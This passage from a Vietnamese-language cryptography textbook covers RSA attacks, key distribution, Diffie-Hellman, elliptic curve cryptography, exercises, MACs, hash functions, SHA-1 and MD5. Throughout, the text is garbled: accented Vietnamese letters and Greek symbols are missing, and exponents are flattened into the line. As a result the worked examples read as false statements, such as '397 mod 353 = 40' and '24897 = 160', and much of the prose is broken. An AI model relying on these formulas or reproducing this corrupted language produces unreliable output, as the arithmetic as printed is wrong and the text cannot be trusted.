d nguyn t cng nhau vi (n), d dng tnh c kho kia chnh l s nghch o ca n qua thut ton Euclide m rng. V.2.7 An ton ca RSA Trn thc t c nhiu cch tn cng khc nhau i vi m cng khai RSA nh sau: Tm kim kho bng phng php vt cn, phng php ny khng kh thi vi kch thc ln ca cc s hoc tn cng bng ton hc da vo kh vic tnh (n) bng cch phn tch n thnh hai s nguyn t p v q hoc tm cch tnh trc tip (n). Trong qu trnh nghin cu vic thm m ngi ta xut kiu tn cng thi gian trong khi gii m, tc l cn c vo tc m ho v gii m cc mu tin cho trc m phn on cc thng tin v kho. Cui cng c nhng nghin cu tn cng RSA vi iu kin bit trc bn m cho trc. Cu th nh sau: Bi ton phn tch Tn cng ton hc c 3 dng o Phn tch N = p.q, sau tnh (N) v d o Tm n trc tip (N) v tnh d o Tm d trc tip Hin ti tin rng tt c u tng ng vi bi ton phn tch o C cc bc tin chm theo thi gian o Hin ti cho rng RSA 1024 hoc 2048 l an ton Tn cng thi gian o Pht trin vo gia nm 1990 o Paul Kocher ch ra rng k thm m c th xc nh c kho ring nu theo di thi gian my tnh cn gii m cc bn tin.

    - 77 o Tn cng thi gian khng ch p dng cho RSA, m c vi cc h m cng khai khc. o Tn cng thi gian ging nh k cp on s in thai bng cch quan st mt ngi no trong bao lu chuyn quay in thoi t s ny sang s khc. Tn cng bn m chn trc o RSA c im yu vi tn cng bn m chn trc o K tn cng chn bn m v on bn r c gii m o Chn bn m khm ph RSA cung cp thng tin thm m o C th tnh vi b m ngu nhin ca bn r o Hoc s dng b m m ho phn xng.

    V.3 Qun l kho V.3.1 Phn phi kho M kho cng khai gip gii bi ton phn phi kho, y l nhu cu cp bch cn phi to ra mt c ch chia s kho trong mi trng thng xuyn trao i thng tin v thng xuyn thay i kho. N bao gm hai kha cnh sau: o Phn phi kho mt cch cng khai nhng m bo c b mt. o S dng m kho cng khai phn phi kho mt (cn kho mt dng m ho thng tin). V.3.2 Phn phi kho cng khai c th xem xt c s dng vo mt trong nhng vic sau: o Thng bo cng khai kho ca ngi s dng. o Th mc truy cp cng cng cho mi ngi. o Ch quyn kho cng khai, ngi nm gi kho cng khai. o Chng nhn kho cng khai, kho cng khai ca ngi s dng c ni c thm quyn chng nhn. Thng bo cng khai Ngi dng phn phi kho cng khai cho ngi nhn hoc thng bo rng ri cho cng ng. Chng hn nh ngi s dng c th t b sung kho PGP vo th in t hoc gi cho nhm chia s tin hoc mt danh sch th in t. im yu chnh ca thng bo cng khai l mo danh: mt ngi no c th to kho v tuyn b mnh l mt ngi khc v gi thng bo cho mi ngi khc. Cho n khi gi mo b pht hin th k mo danh c th la trong vai tr ngi khc Th mc truy cp cng cng Dng th mc truy cp cng cng c th t c tnh an ton cao hn bng cch ng k kho vi th mc cng cng ng ti v chia s cho mi ngi. Th mc cn c m bo tin cy vi cc tnh cht sau: o Cha vic nhp tn v kho cng khai o Ngi dng ng k mt vi Th mc o Ngi dng c th thay kho bt c lc no o Th mc c in nh k o Th mc c th truy cp qua mng

    - 78 M hnh trn vn cn c cc l hng k xm nhp sa hoc gi mo khi vo h thng.

    Ch quyn kho cng khai y l bc ci thin tnh an ton bng kim sot cht ch tp trung vic phn phi kho t Th mc. N bao gm cc tnh cht ca mt Th mc nh nu phn trc v i hi ngi dng bit kho cng khai ca Th mc . Sau ngi dng nhn c bt k kho cng khai mong mun no mt cch an ton, bng cch truy cp thi gian thc n Th mc khi cn n kho. Tuy nhin yu cu truy cp thi gian thc l mt nhc im ca cch phn phi kho ny. C th trong kch bn sau hai ngi s dng chia s kho cng khai ca mnh cho nhau thng qua vic s dng kho cng khai ca Ch quyn nhn c kho cng khai ca i tc v trao i qua li khng nh ngi ny bit thng tin ca ngi kia.

    Chng nhn kho cng khai Chng nhn cho php trao i kho khng cn truy cp thi gian thc n Ch quyn th mc kho cng khai. lm vic chng nhn tri danh tnh ca ngi s dng vi kho cng khai ca anh ta v ng du v giy chng nhn trnh gi mo. Cc thng tin i km thng thng l chu k kim nh, quyn s dng, thi hn, Ni dung trn c k bi kho ring tin cy ca Ch quyn chng nhn (CA, Certificate Authority). Do kho cng khai ca CA c thng bo rng ri, nn chng nhn c th c kim chng bi mt ngi no bit kho cng khai ca Ch quyn chng nhn.

    - 79 -

    V.3.3 Phn phi cng khai cc kho mt Ni chung c th s dng cc phng php trn nhn c kho cng khai ca ngi nh trao i thng tin. Kho cng khai dng cho mc ch m ho, gii m hoc xc nhn thng tin l ca i tc. Nhng cc thut ton kho cng khai chm, nn gi bo mt thng tin l t. Do thng thng dng kho i xng m ho v gii m ni dung bn tin, m cn c gi l kho phin hay kha k (section key). C mt s cch tha thun kho phin ph hp gia hai ngi s dng. Phn phi kho mt n gin c xut bi Merkle vo nm 1979 o A to ra mt cp kho cng khai mi tm thi o A gi B mt kho cng khai v danh tnh ca h o B to ra kho phin v gi n cho A s dng kho cng khai c cung cp o A gii m kho phin v c hai cng dng n. Vn nm ch, k th c th ngn hoc ng gi c hai bn ca th tc Nu c kho cng khai th kho phin c trao i an ton

    - 80 V.3.4 Trao i kho hn hp: Ta c th kt hp s dng Trung tm phn phi kho phn phi kho phin nh trn m hnh my ch ca IBM. Trung tm chia s kho chnh (master key) vi mi ngi s dng. V phn phi kho phin s dng kho chnh vi Trung tm. S kho cng khai c dng phn phi kho chnh. S ba lp ny c bit hu ch khi ngi s dng phn tn rng. Cc yu cu cn bn ca h thng l cht lng thc hin v s tng thch nn tng. V.4 Trao i kho Diffie Hellman V.4.1 Yu cu Trao i kho Diffie Hellman l s kho cng khai u tin c xut bi Diffie v Hellman nm 1976 cng vi khi nim kho cng khai. Sau ny c bit n bi James Ellis (Anh), ngi xut b mt nm 1970 m hnh tng t. y l phng php thc t trao i cng khai cc kho mt. N thc y vic nghin cu xut cc m kho cng khai. S c s dng trong nhiu sn phm thng mi. L s trao i kho mt dng kho cng khai: o Khng th dng trao i mu tin bt k. o Tuy nhin n c th thit lp kho chung. o Ch c hai i tc bit n. o Gi tr kho ph thuc vo cc i tc (v cc thng tin v kho cng khai v kho ring ca h). o Da trn php ton ly tha trong trng hu hn (modulo theo s nguyn t hoc a thc) l bi ton d. o an ton da trn kh ca bi ton tnh logarit ri rc (ging bi ton phn tch ra tha s) l bi ton kh. V.4.2 Khi to Diffie Hellman Mi ngi dng tha thun dng tham s chung: o S nguyn t rt ln q hoc a thc. o l cn nguyn t ca mod q. Mi ngi dng (A chng hn) to kho ca mnh: o Chn mt kho mt (s) ca A: xA < q x o Tnh kho cng khai ca A: yA = A mod q. o Mi ngi dng thng bo cng khai kho ca mnh yA. V.4.3 Trao i kho Diffie Hellman Kho phin dng chung cho hai ngi s dng A, B l KAB KAB = xA.xB mod q = yAxB mod q (m B c th tnh) = yBxA mod q (m A c th tnh) KAB c s dng nh kho phin trong s kho ring gia A v B A v B ln lt trao i vi nhau, h c kho chung KAB cho n khi h chn kho mi. K thm m cn x, do phi gii tnh logarit ri rc

    - 81 V d: Hai ngi s dng Alice & Bob mun trao i kho phin: ng chn s nguyn t q=353 v =3 Chn cc kho mt ngu nhin: A chn xA=97, B chn xB=233 Tnh cc kho cng khai: yA=397 mod 353 = 40 (Alice) yB=3233 mod 353 = 248 (Bob) Tnh kho phin chung: (Alice) KAB= yBxA mod 353 = 24897 = 160 (Bob) KAB= yAxB mod 353 = 40233 = 160 V.5 M ng cong Elip m bo tnh an ton a s m cng khai s dng s hc s nguyn ln hoc a thc vi cc s nguyn rt ln hoc a thc bc cao. Do buc phi ti phn quan trng vo kho nh x l kho v mu tin. Lm nh vy va tn b nh va d mt an ton. khc phc iu m vn m bo an ton ca m cng khai, ngi ta xut cch khc l dng ng cong Elip. y cc php ton c thc hin trn cc xu bit c kch thc nh hn. V.5.1 M ng cong Elip thc ng cong Elip c nh ngha bi phng trnh vi 2 bin x, y v h s thc Xt ng cong Elip bc 3 dng: y2 = x3 + ax + b trong x, y, a, b l cc s thc v nh ngha thm im O. C php cng i vi ng cong Elip o V hnh hc tng ca P v Q l im i xng ca giao im R o im O ng vai tr l n v i vi php cng v n l im v cc.

    - 82 V.5.2 ng cong Elip hu hn M ng cong Elip s dng ng cong Elip m cc bin v h s l hu hn. C hai h c s dng ni chung: o ng cong nguyn t Ep(a,b) c xc nh trn Zp S dng cc s nguyn modulo s nguyn t Tt nht trong phn mm o ng cong nh phn E2n(a,b)xc nh trn GF(2n) S dng a thc vi h s nh phn Tt nht trong phn cng V.5.3 ng cong Elip (ECC Elliptic Curve Cryptography) Trong ECC php cng ging php nhn ca modulo v php cng lp trong ECC (tc l php nhn mt im vi mt h s) ging nh php ly tha ca modulo. Bi ton sau y trong ECC l bi ton kh tng ng vi bi ton logarit ri rc: o Gi s cho Q = k.P, trong P, Q l 2 im ca ng cong Elip o D dng tnh Q, nu cho trc P, k o Rt kh tm k, nu cho trc P, Q. Bi ton tm h s k chnh l bi ton kh bi ton logarit ng cong Elip. M ng cong Elip da trn bi ton kh mt chiu ny du kho ring. V d: Xt E11(1,6). Cc php cng sau y thc hin trong Modulo 11.

    V.5.4 ECC Diffie Hellman Chng hn da trn c s kh ca bi ton tm h s lin h gia hai im nh trn, ngi ta a ra s trao i kho ECC Diffie Hellman ging nh trao i kho Diffie Helman thng thng. y php ly tha trong Modulo thng thng c thay bng php nhn mt im vi h s trong ECC v php logarit ri rc c thay bng php ton cho 2 im tm h s lin h gia chng. Bi ton sau l bi ton kh xc nh an ton ca s trao i cng khai kho chung.

    - 83 Nhm ngi dng chn chung mt ng cong Elip ph hp Ep(a,b) Chn im c s G=(x1,y1) vi bc ln, tc l n ln sao cho nG = O Hai ngi s dng A v B chn kho ring ca mnh: nA< n, nB< n Sau h tnh cc kho cng khai ca A v B: PA=nAG,PB=nBG. V cho cng b cng khai PA v PB. Hai ngi s dng dng chung kho mt: K=nAnBG. Mi ngi u c cch tnh kho chung bng cch ly kho ring ca mnh nhn vi kho cng khai ca i tc: K=nAPB, K=nBPA

    V.5.5 ECC m v gii m C mt s cch dng ng cong Elip to m cng khai, ta xt cch n gin nht sau: Trc ht nhm ngi s dng cn phi thng nht chn mt ng cong Elip ph hp v mt im G ging nh trong trao i kho ECC Diffie Hellman. Mi bn tin M c coi nh mt im PM trn ng cong Elip . Mi ngi s dng chn mt kho ring cho mnh nA < n V tnh kho cng khai cng b PA=nAG ECC m bn tin M tng ng vi im PM trn ng cong Elip bng cch to bn m CM l cp im trn ng cong Elip nh sau: CM={kG, PM+k Pb}, k l s ngu nhin Ta thc hin php ton trn hai im ca CM gii m tm PM PM+kPbnB(kG) = PM+k(nBG)nB(kG) = PM An ton ECC Da trn bi ton tm h s lin h gia hai im trn ng cong Elip gi l bi ton logarit trn ng cong Elip. Phng php nhanh nht gii bi ton trn bit l Pollard rho method. Bi ton ny tng ng vi bi ton phn tch ra tha s, nhng c th s dng kch thc kho nh hn nhiu, chng hn so vi RSA. Ngi ta chng minh c rng vi di kho bng nhau cc tnh ton ni chung l tung ng. Vy vi an ton nh nhau ECC c nhiu u im v khng gian lu tr v tnh an ton i km.

    - 84 -

    Bi tp 1. 2. 3. 4. 5. 6. 7. Tnh m ho RSA ca bn ghi sau: p=7, q=11, e = 3, NSD A chn kho ring xA = 7, tnh kho cng khai ca A NSD B gi bn tin M = 5 v m bng kho cng khai ca A NSD A gii m s dng nh l phn d Trung Hoa Tnh m ho RSA ca bn ghi sau: p=11, q=13, e = 7, NSD A chn kho ring xA = 9, tnh kho cng khai ca A NSD B gi bn tin M = 7 v m bng kho cng khai ca A NSD A gii m s dng nh l phn d Trung Hoa Tnh m ho RSA ca bn ghi sau: p=23, q=31, NSD A chn kho ring xA = 13, tnh kho cng khai ca A NSD B gi bn tin M = 20 v m bng kho cng khai ca A NSD A gii m s dng nh l phn d Trung Hoa Trao i kho Difie Hellman: Chn s nguyn t dung chung q = 131 v = 7, NSD A chn kho ring xA = 11 NSD B chn kho ring xB = 19 Tnh kho cng khai ca A v B Nu cch A va B tnh kho mt dng chung gia A v B Trao i kho Difie Hellman: Chn s nguyn t dung chung q = 131 v = 7, NSD A chn kho ring xA = 11 NSD B chn kho ring xB = 19 Tnh kho cng khai ca A v B Nu cch A va B tnh kho mt dng chung gia A v B M ng cong Elip Cho h ng cong Elip y2 = (x3 + x + 1) mod 13 V th ng cong trn. Cho G = (4, 2) NSD A chn kho ring xA = 2 NSD B chn kho ring xB = 3 Tnh kho cng khai ca A v B Nu cch A va B tnh kho mt dng chung gia A v B M ng cong Elip Cho h ng cong Elip y2 = (x3 + x + 1) mod 23 Cho G = (3, 10) NSD A chn kho ring xA = 2 NSD B chn kho ring xB = 3 Tnh kho cng khai ca A v B

    - 85 Nu cch A va B tnh kho mt dng chung gia A v B 8. M Elgamal: Cho h (G, , ) trong G l mt nhm vi php nhn v , l hai phn t ca G. Cng khai G, , Gi b mt lu tha nguyn a tho mn: a = ( tm c a phi gii bi ton logarit ri rc l bi ton kh) M ho mu tin M bng cch chn ngu nhin s k v tnh: C=E(M) = (y1, y2) = (k , M.k ) Gii m: C = y2 . (y1a)-1 a) p dng v d trn cho p = 79, = 5, a = 3, M = 19 v k = 4. y nhm vi php nhn l Zp, tnh . Tm bn m C ca bn r M v gii m b) p dng v d trn cho p = 191, = 7, a = 5, M = 29 v k = 9. y nhm vi php nhn l Zp, tnh . Tm bn m C ca bn r M v gii m. c) p dng v d trn cho p = 191, = 7, a = 5, M = 29 v k = 9. y nhm vi php nhn l Zp, tnh . Tm bn m C ca bn r M v gii m. 9. Nu thut ton tnh ly tha ca mt c s cho trc. nh gi phc tp ca thut ton . 10. Ti sao c th ni nu dng nh l Trung Hoa gii m th tc gii m nhanh gp 4 ln khng dng n.

    - 86 CHNG 6: XC THC MU TIN V CC HM HASH VI.1 Xc thc mu tin VI.1.1 Cc khi nim Xc thc mu tin lin quan n cc kha cnh sau khi truyn tin trn mng o Bo v tnh ton vn ca mu tin: bo v mu tin khng b thay i hoc c cc bin php pht hin nu mu tin b thay i trn ng truyn. o Kim chng danh tnh v ngun gc: xem xt mu tin c ng do ngi xng tn gi khng hay mt k mo danh no khc gi. o Khng chi t bn gc: trong trng hp cn thit, bn thn mu tin cha cc thng tin chng t ch c ngi xng danh gi, khng mt ai khc c th lm iu . Nh vy ngi gi khng th t chi hnh ng gi, thi gian gi v ni dung ca mu tin. Ngoi ra c th xem xt b sung thm cc yu cu bo mt nh m ho. Vi mong mun p ng cc yu cu trn, c 3 hm la chn sau y c s dng: o M mu tin bng m i xng hoc m cng khai. o M xc thc mu tin (MAC): dng kho v mt hm nn mu tin cn gi nhn c mt c trng nh km vi mu tin v ngi gi . o Hm hash (hm bm) l hm nn mu tin to thnh du vn tay cho mu tin. Cc yu cu bo mt khi truyn mu tin trn mng. Tm cc bin php cn thit chng i li cc hnh ng ph hoi nh sau: o l b mt: gi b mt ni dung mu tin, ch cho ngi c quyn bit. o Thm m ng truyn: khng cho theo di hoc lm tr hon vic truyn tin. o Gi mo: ly danh ngha ngi khc gi tin. o Sa i ni dung: thay i, ct xn, thm bt thng tin. o Thay i trnh t cc gi tin nh ca mu tin truyn. o Sa i thi gian: lm tr hon mu tin. o T chi gc: khng cho php ngi gi t chi trch nhim ca tc gi mu tin. o T chi ch: khng cho php ngi nhn ph nh s tn ti v n ch ca mu tin gi. VI.1.2 M mu tin M mu tin bn thn cung cp mt phn tnh xc thc, v kho c chia s gia ngi gi v ngi nhn cng nh vic thay i ni dung cng khng d dng thc hin nu khng c kho. C th nu m i xng c s dng th ngi nhn bit ngi gi phi to ra mu tin, v ch c ngi gi v ngi nhn bit c kho s dng. Ngi nhn c th bit ni dung khng b sa i, nu mu tin c cu trc ph hp, tnh d tha v tng kim tra pht hin bt c thay i no. Nu kho cng khai c s dng th m cung cp khng tin cy v ngi gi, v mi ngi u c th bit kho cng khai ca ngi nhn. Tuy nhin nu ngi gi k mu tin s dng kho ring ca h v sau m vi kho cng khai ca ngi nhn, th khi m bo c tnh bo mt v xc thc ca mu tin. Cn phi b sung cc bin php pht hin cc mu tin b lm hng. Vic s dng kho ring ca

    - 87 ngi gi kt hp vi kho cng khai ca ngi nhn c nhiu u vit, nhng vi gi phi tr l chm do dng 2 m kho cng khai trn mu tin. VI.1.3 M xc thc mu tin (MAC Message Authentication Code) Sinh ra bi mt thut ton m to ra mt khi thng tin nh c kch thc c nh o Ph thuc vo c mu tin v kho no . o Ging nh m nhng khng cn phi gii m. B sung vo mu tin nh ch k gi km theo lm bng chng xc thc. Ngi nhn thc hin tnh ton no trn mu tin v kim tra xem n c ph hp vi MAC nh km khng. To nim tin rng mu tin khng b thay i v n t ngi gi.

    Cc m xc thc mu tin MAC cung cp s tin cy cho ngi nhn l mu tin khng b thay i v t ch danh ngi gi. Cng c th s dng m xc thc MAC km theo vi vic m ho bo mt. Ni chung ngi ta s dng cc kho ring bit cho mi MAC v c th tnh MAC trc hoc sau m ho, tt hn l thc hin MAC trc v m ho sau. S dng MAC c nhc im l MAC ph thuc vo c mu tin v c ngi gi, nhng i khi ch cn xc thc mu tin v thng tin xc thc ch ph thuc mu tin lu tr lm bng chng cho tnh ton vn ca n. Khi ngi ta s dng hm Hash thay v MAC. Cn lu rng MAC khng phi l ch k in t, v c ngi gi v ngi nhn u bit thng tin v kho. Cc tnh cht ca MAC MAC l thng tin nn ca mu tin kt hp vi kho MAC = CK(M) o Nn bn tin M c di ty o S dng kho mt K o To nn du xc thc c di c nh o L hm nhiu - mt, ngha l c nhiu bn tin khc nhau nhng c cng MAC. Tuy nhin ta phi la chn hm MAC sao cho xc sut cc mu tin c ngha c MAC trng nhau l rt nh. Vic tm c cc mu tin nh vy l rt kh khn Yu cu i vi MAC Tu thuc vo kiu tn cng m MAC phi c cc tnh cht khc nhau chng i li. Nhng ni chung MAC phi tha mn cc iu sau

    - 88 o Bit mu tin v MAC, khng th tm c mu tin khc c cng MAC. o Cc MAC cn phi phn b u o MAC phi ph thuc nh nhau vo tt c cc bit trong mu tin. Tc l khi thay i mt bit thng tin no , MAC s c nhng thay i ko theo. VI.1.4 S dng m i xng cho MAC C th dng m khi vi ch chui mc ni bt k v s dng khi cui cng ca m khi lm MAC ca mu tin. Thut ton xc thc d liu (DAA Data Authentication Algorithm) l MAC c s dng rng ri da trn ch DES-CBC, trong o S dng vc t ban u IV = 0 v b m 0 ca block cui cng o V m mu tin s dng chun m d liu DES trong ch CBC o Gi ly block cui cng nh l MAC ca c mu tin hoc M bit tri nht (16 M 64) ca khi cui cng Nhng by gi MAC cui cng vi kch thc 64 bit cng l qu nh m bo an ton. Do ngi ta tm cch to nn cc MAC c kch thc ln hn. VI.2 Cc hm Hash (hay cn gi l hm bm). VI.2.1 Cc yu cu Nn mu tin bt k v kch thc c nh. V gi thit l hm hash l cng khai v khng dng kho. Hash ch ph thuc mu tin, cn MAC ph thuc thm c vo kho. Hash c s dng pht hin thay i ca mu tin. Hash c th s dng nhiu cch khc nhau vi mu tin, Hash thng c kt hp dng to ch k trn mu tin.

    Cc tnh cht ca hm Hash Hm Hash to nn du vn tay (tc l thng tin c trng) ca mt tp, mu tin hay d liu h = H(M) Nn mu tin c kch thc ty v du vn tay c kch thc c nh. Hm Hash c gi thit l cng khai, mi ngi u bit cch s dng

    - 89 Cc yu cu ca hm Hash C th p dng cho mi mu tin c kch thc tu . Tuy nhin phi to u ra h c kch thc c nh, thng l 128 bit n 1024 bit. D tnh h = H(M)cho mi mu tin M, hm H tnh ton nhanh, hiu qu ph thuc cht vo mu tin M v khng tnh ton ngc li. Cho trc h khng th tm c (rt kh) x sao cho H(x) = h. Tnh cht ny gi l tnh cht mt chiu, chiu tm nghch nh rt kh khn, tuy chiu tm nh li d dng. Cho x khng th tm c y sao cho H(y) = H(x). y l tnh cht chng va chm yu, khng tm c mu tin c cng Hash vi mu tin cho. V khng th tm c x, y sao cho H(y) = H(x). y gi l tnh cht chng va chm mnh, y l yu cu cao hn tnh chng va chm yu. VI.2.2 Cc hm hash n gin C mt s xut cho mt s hm hash n gin. Chng hn biu din mu tin di dng bit sau chia chng thnh cc khi bit c kch thc bng kch thc mong mun ca Hash. Ri da trn php ton XOR cc bit thng tin cng v tr tng ng ca cc khi, kt qu nhn c l Hash ca c mu tin. Hm hash trn l khng an ton v i vi mu tin bt k c th tm c mu tin m c cng hm hash.Cn phi c hm mnh hn, m s xt trong chng sau. Tn cng ngy sinh nht C th ngh hash 64 bit l an ton, c ngha l kh tm c bn tin c cng hash. Nhng khng phi vy v nghch l ngy sinh nht nh sau: trong lp c t nht bao nhiu sinh vin, xc sut c t nht 2 sinh vin trng ngy sinh nht l ln hn 0.5. Theo l thuyt xc sut thng k gi s sinh vin t nht trong lp l k, khi xc sut q khng c 2 ngi no trng ngy sinh l t s gia cch chn k ngy khc nhau trong 365 ngy trn s cch chn k ngy bt k trong 365 ngy. Vy q = Ck365 / 365k Do , xc sut p c t nht 2 ngi trng ngy sinh l p = 1 q = 1 - Ck365 / 365k p > 0.5 th k > 22 hay k =23, c th khi p = 0.5073. Khi cha tnh ton chi tit chng ta ngh l trong lp phi c t nht khong 365/2 tc l 184 sinh vin. Nhng trn thc t con s t hn rt nhiu ch cn 23 sinh vin, chnh v vy ta gi y l nghch l ngy sinh nht. iu mun ni ln rng, trong nhiu trng hp xc sut hai mu tin c cng bn Hash l khng nh nh chng ta tng. Tn cng ngy sinh nht hot ng nh sau o K thm m to ra 2m/2 bin th ca mu tin ng m tt c u c bn cht ng ngha nh nhau, vi m y l di ca bn m hash. o K thm m cng c th to ra 2m/2 bin th khc nhau ca mu tin la di, tc l c ng ngha ngc li

    - 90 o Hai tp tin c so snh vi nhau tm cp c cng bn hash (xc sut >= 0.5 da vo nghch l ngy sinh nht) o Ngi dng k vo mu tin ng, sau b thay th bng mu tin gi m cng c ch k ng. Kt lun l cn phi dng MAC c kch thc ln hn na.

    VI.2.3 M khi nh hm Hash C th s dng m khi nh hm Hash o S dng H0 = 0 v b m khng cho khi cui cng o Tnh Hi = EMi [Hi-1] o V s dng khi cui cng nh gi tr hm hash o Ging ch CBC nhng khng c kho Hash kt qu qu nh (64 bit) o C v tn cng sinh nht trc tip o C tn cng gia chng Cc phng n khc cng d b tn cng K thm m cng c th to ra 2m/2 bin th khc nhau ca mu tin VI.2.4 Tnh an ton ca hm Hash v MAC. Ging nh i vi m khi, hm hash cng c tn cng vt cn, c th: Hash chng va chm mnh c gi 2m/2, c ngha l vi m l di m hash th 2m/2 xc nh sc mnh ca n chng i li tn cng vt cn. Ta cn la chn m ln vic dut tm 2m/2 phng n l khng kh thi. C xut Hash 128 bit cho MD5 phn cng. Nhng c th tm c va chm sau 24 ngy. Do c th coi l hash 128 bit c th c l hng, khng an ton, tt hn dng hash 160 bit. Tn cng vt cn trn MAC kh hn, v chng i hi mt cp MAC ca mu tin bit, do n ph thuc thm vo kho. C th tn cng vo khng gian kho (nh l tm kho) hoc MAC. di t nht 128 bit MAC l cn thit m bo an ton Thm m tn cng c cu trc Ging nh m khi mun dng tn cng vt cn, c mt s cc tn cng thm m l la chn tt nht hin c. Chng hn Nu CVi = f[CVi-1, Mi]; H(M)=CVN Th y thng thng khai thc s va chm ca hm f Ging m khi thng gm mt s vng lp Khi tn cng s dng cc tnh cht ca cc hm vng. VI.3 Cc thut ton Hash v MAC VI.3.1 Cc thut ton Hash v MAC Hm Hash: thc hin vic nn mu tin v kch thc c nh bng cch x l mu tin theo tng khi kt hp dng mt hm nn no v c th s dng m khi. M xc thc mu tin (MAC): thc hin to phn xc thc cho mu tin c kch thc c nh, cung cp tnh ton vn ca mu tin v tnh xc thc thng qua vic s dng kho. C th tien hnh bng cch s dng m khi vi ch mc ni hoc hm Hash. Cu trc thut ton Hash

    - 91 -

    VI.3.2 Thut ton Hash an ton SHA (Secure Hash Algorithm) SHA c ngun gc t Vin chun cng ngh quc gia Hoa k - NIST & NSA vo nm 1993, sau c nng cp vo 1995 theo chun US v chun l FIPS 180-1 1995 v Internet RFC3174, c nhc n nh SHA-1. N c s dng vi s ch k in t DSA (Digital Signature Algorithm). Thut ton l SHA da trn thit k MD4 vi mt s khc bit to nn gi tr Hash 160 bit. Cc kt qu nghin cu 2005 v an ton ca SHA-1 xut s dng n trong tng lai. Sau y ta m t chi tit thut ton SHA-1 v MD5: Thut ton SHA-1 M t tht ton u vo ca thut ton l mt thng ip c chiu di bt k nh hn 264 bit, SHA-1 cho ra kt qu l mt thng ip rt gn c di l 160 bit M rng thng ip: f(t;B,C,D) c nh ngha nh sau. f(t;B,C,D) = (B AND C) OR ((NOT B) AND D) (0t19) f(t;B,C,D) = B XOR C XOR D (20t39) f(t;B,C,D) = (B AND C) OR (B AND D) OR (C AND D) (40t59) f(t;B,C,D) = B XOR C XOR D (60t79). Thng ip M c m rng trc khi thc hin bm. Mc ch ca vic m rng ny l m bo cho thng ip m rng c di l bi s ca 512. Gi s di ca thng ip l l bit. Thm bit 1 vo cui thng ip, theo sau l k bit 0 (k l s dng khng m nh nht sao cho l+1+k=448 (mod512)) . Sau thm khi 64 bit l biu din nh phn ca l. Phn tch thng ip m rng:

    - 92 Sau khi thng ip c m rng, thng ip m rng c phn tch thnh N khi 512 bit M(1),M(2),,M(N). Trong 512 bit ca khi d liu u vo c th c th hin bng 16 t 32 bit, Khi to gi tr bm: Gi tr bm l mt chui bit c kch thc bng kch thc ca thng ip bm (tr SHA384) gm cc t ghp li. Trong Hj(i) l t j trong gi tr bm ln lp i vi 0iN (s block c c sau khi chia vn bn c m) v 0j(s t trong gi tr bm -1).Trc khi thc hin gi tr bm, vi mi thut ton bm an ton, gi tr bm ban u H(0) phi c thit lp. Kch thc v s lng t trong H(0) tu thuc vo kch thc thng ip rt gn. SHA-1 s dng dy cc hng s K(0),K(79) c gi tr nh sau: K(t) = 5A827999 ( 0 <= t <= 19) K(t) = 6ED9EBA1 (20 <= t <= 39) K(t) = 8F1BBCDC (40 <= t <= 59) K(t) = CA62C1D6 (60 <= t <= 79). Thut ton ca bc tnh gi tr bm SHA-1 SHA-1 c s dng bm thng ip M c di l bit tho mn iu kin 0l264 . Thut ton s dng: - Mt bng phn b thng ip gm 80 t 32 bit - 5 bin 32 bit - Mt gi tr bm gm 5 t 32 bit Kt qu ca SHA-1 l mt thng ip rt gn c di 160 bit. Cc t ca bng phn b thng ip c k hiu W(0),W(1),,W(79). 5 bin c k hiu l a,b,c,d,e. Cc t ca gi tr bm k hiu H0(i),H1(i), H2(i), H3(i),H4(i). H(0) gi gi tr bm ban u v c thay th bng cc gi tr bm thnh cng.H(i) sau mi khi thng ip c x l v kt thc bng gi tr bm cui cng H(N). Tnh ton thng ip bm nh ngha: S^n(X)=(X<<n) or (X>>32-n). X<<n c ngha l loi b t tri sang phi n bit v thm vo kt qu n s 0 vo bn phi. X>> c ngha l loi b t phi qua tri n bit v thm vo kt qu n s 0 vo bn tri. Khi to H H0 = 67452301 ; H1 = EFCDAB89 H2 = 98BADCFE ; H3 = 10325476 H4 = C3D2E1F0. Chia M(i) thnh 16 t W(0), W(1),,W(15) For t = 16 to 79 - W(t) = S^1(W(t-3) XOR W(t-8) XOR W(t-14) XOR W(t-16)). - t a=H0 , b=H1,c=H2,d=H3,e=H4 For t = 0 to 79 do - TEMP = S^5(A) + f(t;B,C,D) + E + W(t) + K(t); - e = d; d = c; c = S^30(b); b = a; a = TEMP; - t H0 = H0 + a,H1 = H1 + b,H2 = H2 + c,H3 = H3 + d,H4 = H4+ e. Sau khi tnh ton c ht M(n), thng ip rt gn l mt chui 160 bit l biu din ca 5 t: H0 H1 H2 H3 H4 nh gi thut ton

    - 93 - SHA-1 c xem l an ton i vi hin tng ng v rt kh tm c hai thng ip khc nhau c gi tr bm ging nhau - SHA-1 c coi l chun ca vic bo v cc knh lin lc trc tuyn tn ti trong 9 nm qua. - SHA-1 c thit k cho b x l 32 bit, th h sp ti ca my tnh dng cc b x l 64 bit m SHA-1 khng hiu qu trn b x l ny. - Thng 2 nm 2005 SHA-1 b tn cng bi 3 chuyn gia ngi Trung Quc. Thut ton ny b gii m thng qua phng php tnh phn b. Thut ton MD5 M t thut ton Thut ton c u vo l mt thng ip c di tu v c u ra l mt chui c di c nh l 128 bit. Thut ton c thit k chy trn cc my tnh 32 bit. Thut ton: Thng ip u vo c di b bit bt k. Biu din cc bit di dng nh sau: m[0] m[1] m[2] ... m[b-1] Bc1: Cc bit gn thm : Thng ip c m rng, thm bit vo pha sau sao cho di ca n (bit) ng d vi 448 theo mun 512. Ngha l thng ip c m rng sao cho n cn thiu 64 bit na th s c mt di chia ht cho 512. Vic thm bit ny c thc hin nh sau: mt bit 1 c thm vo sau thng ip, sau cc bit 0 c thm vo c mt di ng d vi 448 mun 512. Bc 2: Gn thm di: Dng biu din 64 bit di b ca chui ban u c thm vo pha sau kt qu ca bc 1. Bc 3: Khi to b m MD: Mt b m 4 t (A,B,C,D) c dng tnh m s thng ip. y mi A,B,C,D l mt thanh ghi 32 bit. Nhng thanh ghi ny c khi to theo nhng gi tr hex sau : A=0x01234567 B=0x89abcdef C=0xfedcba98 D=0x76543210 Bc 4 :X l thng ip theo tng khi 16 t. nh ngha cc hm ph, cc hm ny nhn gi tr u vo l 3 t 32 bit v to to ra mt word 32 bit. F(X,Y,Z) = XY v not(X) Z G(X,Y,Z)= XZ v Y not(Z) H(X,Y,Z) = X xor Y xor Z I(X,Y,Z) = Y xor (X v not(Z)) Bc ny s dng mt bng 64 gi tr T[1 .. 64] c to ra t hm sin. Gi T l phn t th i ca bng, th T l phn nguyn ca 4294967296*|sin(i)| , i c tnh theo radian. Thut ton /* X l vi mi khi 16 bit t */ For i = 0 to N/16-1 do /* Sao khi i vo X. */ For j = 0 to 15 do Set X[j] to M[i*16+j]. end AA = A

